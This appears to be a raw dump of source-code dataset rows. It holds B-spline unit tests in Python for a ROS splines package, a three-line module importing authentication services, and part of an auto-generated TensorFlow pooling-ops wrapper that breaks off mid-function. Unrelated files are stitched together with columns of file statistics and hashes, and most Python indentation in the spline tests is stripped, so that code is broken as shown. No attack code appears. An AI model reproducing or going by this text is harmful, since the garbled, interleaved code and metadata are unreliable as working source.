# does, however, preserve the curve at ti[0] (all derivatives) and
# interpolate the value at ti[1]. Verify this.
# For all derivatives at ti[0]
for d in range(0,order):
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[0],d)
p = aspl.evalD(ti[0],d)
#print "[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t,d,ref_p,p)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[0],d,ref_p,p))
# Now check that it interpolates the position at ti[1]
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[1],0)
p = aspl.evalD(ti[1],0)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[1],d,ref_p,p))
# Now check that the curve interpolates p_k at t_k
curve_p_k = aspl.evalD(t_k,0)
for i in range(0,p.size):
self.assertAlmostEqual(p_k[i],curve_p_k[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t_k,d,ref_p,p))
def test_remove_segment(self):
numpy.random.seed(8)
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now remove a curve segment
aspl.removeCurveSegment()
# Check that the knot sequence is good.
ref_knots = aspl_ref.knots()
knots = aspl.knots()
self.assertEqual(knots.size,ref_knots.size - 1)
for i in range(0,knots.size):
self.assertEqual(knots[i],ref_knots[i+1])
# Check that the time range is still good.
self.assertEqual(aspl.t_min(),aspl_ref.timeInterval(0)[1])
# Check that the coefficients survived.
ref_coeff = aspl_ref.coefficients()
coeff = aspl.coefficients()
self.assertEqual(coeff.shape[1], ref_coeff.shape[1] - 1)
for r in range(0,coeff.shape[0]):
for c in range(0,coeff.shape[1]):
self.assertEqual(coeff[r,c], ref_coeff[r,c+1], msg="Order %s, coeff[%d,%d] %f != %f\n%s\n%s" % (order, r,c,coeff[r,c], ref_coeff[r,c+1],coeff,ref_coeff))
# Now we check that the curve still evaluates well.
            for t in numpy.arange(aspl.t_min(), aspl.t_max(), 0.01):
for d in range(0,order):
# Exactly equal...not approximately equal.
self.assertEqual(aspl.evalD(t,d),aspl_ref.evalD(t,d))
def test_integral(self):
for order in range(2,8,2):
for dt in numpy.arange(0.1,2.0,0.1):
# Create a spline with three segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(4)
kc = aspl.numCoefficientsRequired(4);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0, (kr - 1)*dt, kr)
cp = numpy.random.random(kc);
cpa = numpy.array([cp])
aspl = bsplines.BSpline(order);
aspl.setKnotVectorAndCoefficients(knots,cpa);
fspl = (knots,cp,order-1)
for a in numpy.arange(aspl.t_min(),aspl.t_max()-1e-15,0.4*dt):
for i in numpy.arange(aspl.t_min(), aspl.t_max()-1e-15, 0.4*dt):
print("Eval at %f\n" % (i))
f = fp.splint(a,float(i),fspl)
b = aspl.evalI(a,i)
self.assertAlmostEqual(b, f, msg="order %d spline integral evaluated on [%f,%f] (%f != %f) was not right" % (order, a,i,float(b),f))
def test_integral_non_uniform(self):
for order in range(2,8,2):
# Create a spline with three segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(4)
kc = aspl.numCoefficientsRequired(4);
# Choose a non-uniform knot sequence.
knots = numpy.linspace(0.0, (kr - 1), kr)
knots = knots*knots
cp = numpy.random.random(kc);
cpa = numpy.array([cp])
aspl = bsplines.BSpline(order);
aspl.setKnotVectorAndCoefficients(knots,cpa);
fspl = (knots,cp,order-1)
for a in numpy.arange(aspl.t_min(),aspl.t_max()-1e-15,0.4):
for i in numpy.arange(aspl.t_min(), aspl.t_max()-1e-15, 0.4):
print("Eval at %f\n" % (i))
f = fp.splint(a,float(i),fspl)
b = aspl.evalI(a,i)
self.assertAlmostEqual(b, f, msg="order %d spline integral evaluated on [%f,%f] (%f != %f) was not right" % (order, a,i,float(b),f))
def test_integral_non_uniform_repeated(self):
for order in range(2,8,2):
# Create a spline with three segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(4)
kc = aspl.numCoefficientsRequired(4);
# Choose a non-uniform knot sequence.
knots = numpy.linspace(0.0, (kr - 1), kr)
knots = knots*knots
for i in range(0,len(knots)):
if i & 1 > 0:
knots[i] = knots[i-1]
cp = numpy.random.random(kc);
cpa = numpy.array([cp])
aspl = bsplines.BSpline(order);
aspl.setKnotVectorAndCoefficients(knots,cpa);
fspl = (knots,cp,order-1)
for a in numpy.arange(aspl.t_min(),aspl.t_max()-1e-15,0.4):
for i in numpy.arange(aspl.t_min(), aspl.t_max()-1e-15, 0.4):
print("Eval at %f\n" % (i))
f = fp.splint(a,float(i),fspl)
b = aspl.evalI(a,i)
self.assertAlmostEqual(b, f, msg="order %d spline integral evaluated on [%f,%f] (%f != %f) was not right" % (order, a,i,float(b),f))
def test_quadratic_integral_diag(self):
numpy.random.seed(5)
for order in range(2,6,1):
for dim in range(1,4):
# Create a spline with three segments
#A = createUniformKnotBSpline(order,4,dim, knotSpacing = 0.5);
#A = createExponentialKnotBSpline(order,4,dim, knotSpacing = 1.0);
A = createRandomKnotBSpline(order,3,dim);
aspl = A[0]
for DO in range(0,order):
w = numpy.random.random(dim);
W = numpy.diag(w);
ef = lambda t: numpy.dot(numpy.asmatrix(aspl.Phi(t,DO)).T , numpy.dot(W, numpy.asmatrix(aspl.Phi(t,DO))))
# for each segment
for s in range(0,aspl.numValidTimeSegments()):
interval = aspl.timeInterval(s)
# si.quad can't do matrices...blerg.
E = aspl.segmentQuadraticIntegralDiag(w,s,DO)
Eest = numpy.zeros(E.shape)
for r in range(0,E.shape[0]):
for c in range(0,E.shape[1]):
efrc = lambda t: ef(t)[r,c]
A = si.quad(efrc,interval[0],interval[1])
Eest[r,c] = A[0]
#print E
#print Eest
self.assertMatricesEqual(E, Eest, 1e-8, "Error comparing E and Eest\n")
def test_quadratic_integral_full(self):
numpy.random.seed(5)
for order in range(2,6,1):
for dim in range(1,4):
# Create a spline with three segments
#A = createUniformKnotBSpline(order,4,dim, knotSpacing = 0.5);
#A = createExponentialKnotBSpline(order,4,dim, knotSpacing = 1.0);
A = createRandomKnotBSpline(order,3,dim)
aspl = A[0]
for DO in range(0,order):
W = numpy.random.random([dim,dim])
W = numpy.dot(W.T,W) + numpy.eye(dim)
ef = lambda t: numpy.dot(numpy.asmatrix(aspl.Phi(t,DO)).T , numpy.dot(W, numpy.asmatrix(aspl.Phi(t,DO))))
# for each segment
for s in range(0,aspl.numValidTimeSegments()):
interval = aspl.timeInterval(s)
# si.quad can't do matrices...blerg.
E = aspl.segmentQuadraticIntegral(W,s,DO)
Eest = numpy.zeros(E.shape)
for r in range(0,E.shape[0]):
for c in range(0,E.shape[1]):
efrc = lambda t: ef(t)[r,c]
A = si.quad(efrc,interval[0],interval[1])
Eest[r,c] = A[0]
#print E
#print Eest
self.assertMatricesEqual(E, Eest, 1e-8, "Error comparing E and Eest\n")
def test_curve_quadratic_integral_full(self):
numpy.random.seed(6)
for order in range(2,6,1):
for dim in range(1,4):
# Create a spline with three segments
#A = createUniformKnotBSpline(order,4,dim, knotSpacing = 0.5);
#A = createExponentialKnotBSpline(order,4,dim, knotSpacing = 1.0);
A = createRandomKnotBSpline(order,3,dim)
aspl = A[0]
for DO in range(0,order):
W = numpy.random.random([dim,dim])
W = numpy.dot(W.T,W) + numpy.eye(dim)
class CurveHelper(object):
def __init__(self,aspl):
self.aspl = aspl
def quad(self,t):
L = self.aspl.coefficientVectorLength()
XX = numpy.zeros([L,L])
S = self.aspl.localCoefficientVectorIndices(t)
XX[numpy.ix_(S,S)] = numpy.dot(numpy.asmatrix(self.aspl.Phi(t,DO)).T , numpy.dot(W, numpy.asmatrix(self.aspl.Phi(t,DO))))
return XX
ch = CurveHelper(aspl)
ef = lambda t: ch.quad(t)
# si.quad can't do matrices...blerg.
E = aspl.curveQuadraticIntegral(W,DO)
Eest = numpy.zeros(E.shape)
interval = aspl.timeInterval()
# quad has trouble with the discontinuities at the knots.
# we can pass the internal knot points as a hint that
# it shouldn't worry so much.
pts = aspl.knots()
pts = pts[pts > interval[0]]
pts = pts[pts < interval[1]]
for r in range(0,E.shape[0]):
for c in range(0,E.shape[1]):
efrc = lambda t: ef(t)[r,c]
A = si.quad(efrc,interval[0],interval[1], points=pts)
Eest[r,c] = A[0]
self.assertMatricesEqual(E, Eest, 1e-6, "Error comparing E and Eest\n")
def test_constant_init(self):
tmin = 0.0
tmax = 5.0
for order in range(2,6):
for dim in range(1,4):
for segs in range(1,4):
c = numpy.random.random([dim])
# Initialize a constant spline
aspl = bsplines.BSpline(order)
aspl.initConstantSpline(tmin,tmax,segs,c)
# Test the time boundaries
self.assertAlmostEqual(tmin,aspl.t_min())
self.assertAlmostEqual(tmax,aspl.t_max())
# Test the value.
for t in numpy.arange(aspl.t_min(),aspl.t_max(),0.1):
self.assertMatricesEqual(aspl.evalD(t,0),c,1e-15,"Error getting back the constant value")
if __name__ == '__main__':
import rostest
rostest.rosrun('splines', 'bspline', TestBSplines)
#tb = TestBSplines()
#tb.test_constant_init()
| 47.739706
| 173
| 0.524536
| 4,292
| 32,463
| 3.908201
| 0.071062
| 0.030464
| 0.021939
| 0.034339
| 0.878204
| 0.869143
| 0.863002
| 0.850066
| 0.841362
| 0.834983
| 0
| 0.028835
| 0.35582
| 32,463
| 679
| 174
| 47.810015
| 0.773288
| 0.168315
| 0
| 0.789784
| 0
| 0.011788
| 0.026844
| 0.001005
| 0
| 0
| 0
| 0
| 0.108055
| 1
| 0.058939
| false
| 0
| 0.015717
| 0
| 0.090373
| 0.005894
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
716d9adb5a268f1d9ba9f01de3c49b640a44ca34
| 164
|
py
|
Python
|
src/auth/service/__init__.py
|
MarkStefanovic/todo-api
|
fb6198511712df853e693787839533f0c9956178
|
[
"MIT"
] | null | null | null |
src/auth/service/__init__.py
|
MarkStefanovic/todo-api
|
fb6198511712df853e693787839533f0c9956178
|
[
"MIT"
] | null | null | null |
src/auth/service/__init__.py
|
MarkStefanovic/todo-api
|
fb6198511712df853e693787839533f0c9956178
|
[
"MIT"
] | null | null | null |
from src.auth.service.bcrypt_password_hash_service import *
from src.auth.service.jwt_token_service import *
from src.auth.service.sqlalchemy_user_service import *
| 41
| 59
| 0.853659
| 25
| 164
| 5.32
| 0.48
| 0.157895
| 0.24812
| 0.406015
| 0.466165
| 0.466165
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 164
| 3
| 60
| 54.666667
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
717fd5c9f172899abcca22d930255476deb270ab
| 548,048
|
py
|
Python
|
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/python/ops/gen_nn_ops.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | null | null | null |
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/python/ops/gen_nn_ops.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | null | null | null |
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/python/ops/gen_nn_ops.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | null | null | null |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: nn_ops.cc
"""
import collections
from tensorflow.python import pywrap_tfe as pywrap_tfe
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from typing import TypeVar
def avg_pool(value, ksize, strides, padding, data_format="NHWC", name=None):
r"""Performs average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Args:
value: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, height, width, channels]`.
ksize: A list of `ints` that has length `>= 4`.
The size of the sliding window for each dimension of `value`.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of `value`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `value`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPool", name, value, "ksize", ksize, "strides", strides,
"padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool_eager_fallback(
value, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPool", value=value, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPool = tf_export("raw_ops.AvgPool")(_ops.to_raw_op(avg_pool))
def avg_pool_eager_fallback(value, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (value,) = _execute.args_to_matching_eager([value], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [value]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPool", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
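# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A minimal sketch of calling the raw op eagerly; the tensor shape and the
# pooling parameters below are arbitrary assumptions chosen for illustration:
#
#   import tensorflow as tf
#   x = tf.random.normal([1, 4, 4, 3])  # [batch, height, width, channels]
#   y = tf.raw_ops.AvgPool(value=x, ksize=[1, 2, 2, 1],
#                          strides=[1, 2, 2, 1], padding="VALID")
#   # With VALID padding and stride 2, y has shape (1, 2, 2, 3).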
def avg_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Performs 3D average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize` window in
`input`.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, channels]` tensor to pool over.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPool3D", name, input, "ksize", ksize, "strides", strides,
"padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool3d_eager_fallback(
input, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPool3D", input=input, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPool3D = tf_export("raw_ops.AvgPool3D")(_ops.to_raw_op(avg_pool3d))
def avg_pool3d_eager_fallback(input, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [input]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPool3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
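# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A minimal sketch with assumed shapes; AvgPool3D pools over a 5-D tensor:
#
#   import tensorflow as tf
#   x = tf.random.normal([1, 4, 4, 4, 3])  # [batch, depth, rows, cols, channels]
#   y = tf.raw_ops.AvgPool3D(input=x, ksize=[1, 2, 2, 2, 1],
#                            strides=[1, 2, 2, 2, 1], padding="VALID")
#   # y has shape (1, 2, 2, 2, 3).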
def avg_pool3d_grad(orig_input_shape, grad, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Computes gradients of average pooling function.
Args:
orig_input_shape: A `Tensor` of type `int32`.
The original input dimensions.
grad: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Output backprop of shape `[batch, depth, rows, cols, channels]`.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `grad`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPool3DGrad", name, orig_input_shape, grad, "ksize", ksize,
"strides", strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool3d_grad_eager_fallback(
orig_input_shape, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPool3DGrad", orig_input_shape=orig_input_shape, grad=grad,
ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPool3DGrad = tf_export("raw_ops.AvgPool3DGrad")(_ops.to_raw_op(avg_pool3d_grad))
def avg_pool3d_grad_eager_fallback(orig_input_shape, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (grad,) = _execute.args_to_matching_eager([grad], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
orig_input_shape = _ops.convert_to_tensor(orig_input_shape, _dtypes.int32)
_inputs_flat = [orig_input_shape, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"AvgPool3DGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"AvgPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
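# --- Illustrative usage (editor's addition, not part of the generated file) ---
# A hedged sketch of the gradient op: given the original input shape and a
# backprop tensor shaped like the pooled output, it returns a gradient with
# the original input shape. Shapes below are assumptions for illustration:
#
#   import tensorflow as tf
#   grad = tf.random.normal([1, 2, 2, 2, 3])  # gradient w.r.t. the pooled output
#   dx = tf.raw_ops.AvgPool3DGrad(orig_input_shape=[1, 4, 4, 4, 3], grad=grad,
#                                 ksize=[1, 2, 2, 2, 1], strides=[1, 2, 2, 2, 1],
#                                 padding="VALID")
#   # dx has shape (1, 4, 4, 4, 3).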
def avg_pool_grad(orig_input_shape, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes gradients of the average pooling function.
Args:
orig_input_shape: A `Tensor` of type `int32`.
1-D. Shape of the original input to `avg_pool`.
grad: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, height, width, channels]`. Gradients w.r.t.
the output of `avg_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the sliding window for each dimension of the input.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the input.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `grad`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPoolGrad", name, orig_input_shape, grad, "ksize", ksize,
"strides", strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool_grad_eager_fallback(
orig_input_shape, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPoolGrad", orig_input_shape=orig_input_shape, grad=grad,
ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPoolGrad = tf_export("raw_ops.AvgPoolGrad")(_ops.to_raw_op(avg_pool_grad))
def avg_pool_grad_eager_fallback(orig_input_shape, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
